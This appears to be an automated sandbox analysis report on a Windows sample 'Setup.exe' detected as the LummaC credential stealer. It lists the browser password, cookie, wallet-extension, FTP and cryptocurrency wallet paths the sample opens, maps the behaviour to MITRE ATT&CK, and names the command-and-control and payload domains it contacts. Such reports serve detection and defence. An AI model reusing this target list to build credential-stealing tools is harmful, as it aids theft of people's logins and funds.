Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior

Source: Yara match	File source: 00000000.00000003.1903279526.000000000105D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1905498616.0000000001066000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Setup.exe PID: 6596, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Setup.exe PID: 6596, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	121 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	121 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	22 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Setup.exe	4%	Virustotal		Browse

Source	Detection	Scanner	Label
https://beefshooti.click:443/apiN	0%	Avira URL Cloud	safe
https://beefshooti.click:443/api2o4p.default-release/key4.dbPK	0%	Avira URL Cloud	safe
https://klipcatepiu0.shop:443/int_clp_ldr_sha.txt	100%	Avira URL Cloud	malware
https://klipcatepiu0.shop/int_clp_ldr_sha.txt	100%	Avira URL Cloud	malware
https://beefshooti.click/apiA	0%	Avira URL Cloud	safe
https://beefshooti.click:443/api	0%	Avira URL Cloud	safe
https://klipcatepiu0.shop/int_clp_ldr_sha.txtDZ	100%	Avira URL Cloud	malware
https://neqi.shop/sdgjyut/psh.txt	100%	Avira URL Cloud	malware
https://klipcatepiu0.shop/	100%	Avira URL Cloud	malware
beefshooti.click	0%	Avira URL Cloud	safe
https://beefshooti.click/apij	0%	Avira URL Cloud	safe
https://beefshooti.click/aN	0%	Avira URL Cloud	safe
https://klipcatepiu0.shop/hB	100%	Avira URL Cloud	malware
https://beefshooti.click/apiN	0%	Avira URL Cloud	safe
https://neqi.shop/sdgjyut/psh.txtM	100%	Avira URL Cloud	malware
https://beefshooti.click/	0%	Avira URL Cloud	safe
https://beefshooti.click/apih3=	0%	Avira URL Cloud	safe
https://neqi.shop:443/sdgjyut/psh.txt	100%	Avira URL Cloud	malware
https://beefshooti.click/api	0%	Avira URL Cloud	safe
https://klipcatepiu0.shop/int_clp_ldr_sha.txtS	100%	Avira URL Cloud	malware
https://beefshooti.click/asse	0%	Avira URL Cloud	safe
https://neqi.shop/sdgjyut/psh.txtf5	100%	Avira URL Cloud	malware
https://beefshooti.click:443/apim	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
beefshooti.click	104.21.18.185	true	true	unknown
neqi.shop	104.21.27.229	true	false	high
klipcatepiu0.shop	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
curverpluch.lat	false		high
slipperyloo.lat	false		high
tentabatte.lat	false		high
manyrestro.lat	false		high
beefshooti.click	true	Avira URL Cloud: safe	unknown
https://neqi.shop/sdgjyut/psh.txt	false	Avira URL Cloud: malware	unknown
bashfulacid.lat	false		high
wordyfindy.lat	false		high
shapestickyr.lat	false		high
talkynicer.lat	false		high
https://beefshooti.click/api	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipcatepiu0.shop:443/int_clp_ldr_sha.txt	Setup.exe, 00000000.00000003.1995816294.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipcatepiu0.shop/int_clp_ldr_sha.txt	Setup.exe, 00000000.00000003.1996461951.000000000105E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1998761099.0000000001060000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contoso.com/License	powershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Setup.exe, 00000000.00000003.1825827041.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851951201.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1825717607.00000000038FF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851091316.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851360446.00000000038F8000.00000004.00000800.00020000.00000000.sdmp	false		high
